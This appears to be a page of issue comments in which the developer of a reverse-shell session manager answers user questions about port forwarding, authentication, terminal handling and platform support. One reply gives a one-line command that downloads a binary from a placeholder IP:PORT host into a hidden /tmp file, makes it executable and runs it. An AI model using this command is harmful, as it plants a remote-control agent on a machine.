Yihang Wang

Results 146 comments of Yihang Wang

这个 Tunnel 确实只最基本的功能,对用户使用确实还不是特别友好。目前在 dev 分支有计划重新写一个客户端和服务端分离的版本,但苦于没时间,只施工了一半(客户端侧只实现了交互式 Shell)。 ### 临时解决方案 师傅您这个情况可以先用一个外部的端口转发来实现把 127.0.0.1 的本地环回端口转发到 0.0.0.0。 * [rinetd](http://www.rinetd.com/) * [port-forwarder.py](https://gist.github.com/WangYihang/e7d36b744557e4673d2157499f6c6b5e)

dev 分支已经有认证了,但是由于改动较多,还没发 release。 提供给你几个临时解决方案: 1. 只使用 cli 2. 前面挂一个反向代理(如:nginx),加上 basic 认证

@tin7safe 感谢反馈,已加入 TODO LIST

Thank you for your good questions. 1. What happens if the victim machine only can use outgoing ports 443 and 80? ``` (a) if the victim machine only can access...

好的,感谢反馈,我待会儿看一下。

临时解决方案: 1. 通过 Upgrade 命令/按钮将当前 Session 升级到 Termite Session 之后就可以正常 CTRL C 退出 `tail -f` 了。@mayongze 2. 如果在非 Termite 的 Session 里,tail -f 执行之后无法通过 CTRL C 退出,可以先 CTRL Z 挂起前台进程组之后再...

嘶,确实奇怪...待我抽空深入研究一下。

@ywledoc 感谢反馈,我研究一下,应该是前端的问题。 临时解决方案: * 使用命令行来 Upgrade * 在最开始弹 Shell 的时候,就直接使用 Termite 相关的一键上线命令,如下: ```bash curl -fsSL http://IP:PORT/termite/IP:PORT-o /tmp/.H7cG && chmod +x /tmp/.H7cG && /tmp/.H7cG ```

okay, I will check this out tonight. thanks for reporting.

The reason is that the termite binary has not been compiled for the **FreeBSD** platform, actually, it only supports `Linux_amd64`. I will give you a quick dirty solution tonight.